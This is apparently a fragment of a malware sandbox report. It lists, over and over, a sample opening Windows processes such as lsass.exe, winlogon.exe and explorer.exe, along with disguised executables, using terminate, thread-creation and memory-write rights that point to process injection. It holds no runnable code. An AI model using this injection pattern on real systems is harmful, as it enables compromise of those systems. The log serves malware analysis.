| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
